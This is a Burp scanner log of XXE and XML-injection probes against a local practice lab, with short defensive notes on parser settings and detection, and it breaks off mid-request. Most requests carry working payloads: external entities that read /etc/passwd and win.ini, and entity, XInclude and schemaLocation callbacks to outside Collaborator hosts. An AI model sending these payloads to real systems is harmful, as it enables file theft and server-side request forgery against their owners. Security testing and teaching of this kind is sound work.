Burp Active Scanner XML issue payload
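XML external entity injection
The first request below is the unmodified baseline. Each later request adds a DOCTYPE that declares one SYSTEM entity and references it in the name, tel or email field. The entity points either at an out-of-band Burp Collaborator URL or at a local file (c:/windows/win.ini, /etc/passwd, and a win.iniX variant, presumably a non-existent path used to compare responses). A parser with DTD processing and external-entity resolution disabled resolves none of these. For a PHP/libxml2 handler such as the process2.php target here, that means not passing LIBXML_NOENT or LIBXML_DTDLOAD to the loader. The bodies are sent as Content-Type: text/plain, so detection keyed only on an XML content type would miss them. Matching on an inbound <!DOCTYPE ... SYSTEM declaration, or on unexpected outbound DNS/HTTP from the application server, is more reliable.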
======================================================
2:35:56 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxezy9dd SYSTEM "http://dhyrzbdb43k185pzvz20eizt9kfd33rxfo6bwzl.burpcollaborator.net"> ]><root><name>demo&xxezy9dd;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe7kqen SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo&xxe7kqen;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe4hjn3 SYSTEM "file:///etc/passwd"> ]><root><name>demo&xxe4hjn3;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxeleqma SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234&xxeleqma;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxesujc3 SYSTEM "file:///etc/passwd"> ]><root><name>demo</name><tel>13812341234&xxesujc3;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe4vonf SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxe4vonf;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 229
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxesaotv SYSTEM "file:///c:/windows/win.iniX"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxesaotv;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxedewx6 SYSTEM "http://rje51pfp6hmfajrdxd4egw17byhr5htbh28pydn.burpcollaborator.net"> ]><root><name>demo&xxedewx6;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxeehbbp SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo&xxeehbbp;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0ca8b SYSTEM "file:///etc/passwd"> ]><root><name>demo&xxe0ca8b;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxey76p6 SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234&xxey76p6;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxecebug SYSTEM "file:///etc/passwd"> ]><root><name>demo</name><tel>13812341234&xxecebug;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe8a53j SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxe8a53j;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 229
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxedazjt SYSTEM "file:///c:/windows/win.iniX"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxedazjt;</email><password>demo1234</password></root>
======================================================
======================================================
2:36:03 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxexy4ec SYSTEM "http://5w2je3s3jvztnx4rarhstaelocu5iv6pugl3br0.burpcollaborator.net"> ]><root><name>demo&xxexy4ec;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
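XML injection
The first request below is again the unmodified baseline. The later requests place one probe at a time into the whole body, the version and encoding attributes of the XML declaration, each of the name, tel, email and password elements, and the User-Agent header. There are four probe forms: a bare Collaborator hostname, an element carrying an xsi:schemaLocation hint, an xi:include element, and the malformed sequence ]]>><. On the server side, a document's own schemaLocation should never decide what the validator fetches, XInclude processing should stay off for untrusted input, and malformed documents should be rejected with a generic error that does not echo parser internals.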
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Connection: close
9kun27g77znxb1svyv5whe2pcgib61utik97zvo.burpcollaborator.net
======================================================
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 202
Connection: close
<?xml version="q7y4po3ougaeyifclcsd4vp6zx5stiha52ssgh.burpcollaborator.net" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 381
Connection: close
<?xml version="<ecg xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kl9y3ihi8ao8cct6z667ip30drjm7cvcj46uuj.burpcollaborator.net/ecg.xsd">ecg</ecg>" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 326
Connection: close
<?xml version="<ucz xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://mqg08kmkdctahey848b9nr82itooce0fo7bxzm.burpcollaborator.net/foo"/></ucz>" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0]]>><" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 200
Connection: close
<?xml version="1.0" encoding="rsn5apopfhvfjj0d6ddepwa7kyqtej2bq3du1j.burpcollaborator.net"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 379
Connection: close
<?xml version="1.0" encoding="<jlv xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://fsbtadodf5v3j70161d2pkavkmqhe727qzdq1f.burpcollaborator.net/jlv.xsd">jlv</jlv>"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 324
Connection: close
<?xml version="1.0" encoding="<fkc xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://b4gpm909r17zv3cxixpy1gmrwi2dq3e42wpndc.burpcollaborator.net/foo"/></fkc>"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8]]>><"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 201
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>pwp3ensnjfzdnh4babhctue5owurih69u1ht5i.burpcollaborator.net</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 380
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name><xkg xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://uyw8gsuslk1ipm6gcgjhvzgaq1wwkm8mwej67v.burpcollaborator.net/xkg.xsd">xkg</xkg></name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 325
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name><imi xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://co4q6akab2r0f4wy2y9zlh6sgjmea4y5mx9pxe.burpcollaborator.net/foo"/></imi></name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo]]>><</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 194
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>vxw9ftttkl0jon5hbhiiu0fbp2vxjn7fv7i06p.burpcollaborator.net</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 373
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel><syk xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://t5z7nr1rsj8hwldfjfqg2yn9x03vrlfl3dq6ev.burpcollaborator.net/syk.xsd">syk</syk></tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 318
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel><oks xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://ycecuw8wzofm3qkkqkxl93ue45a0yqmrajxcl1.burpcollaborator.net/foo"/></oks></tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234]]>><</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 372
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email><vfw xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://oyq2gmumle1cpg6acajbvtg4qvwqkg8gw8j27r.burpcollaborator.net/vfw.xsd">vfw</vfw></email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 317
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email><adv xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://5jpj13f36vmtaxrrxr4sga1lbch75xtyhq4ks9.burpcollaborator.net/foo"/></adv></email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
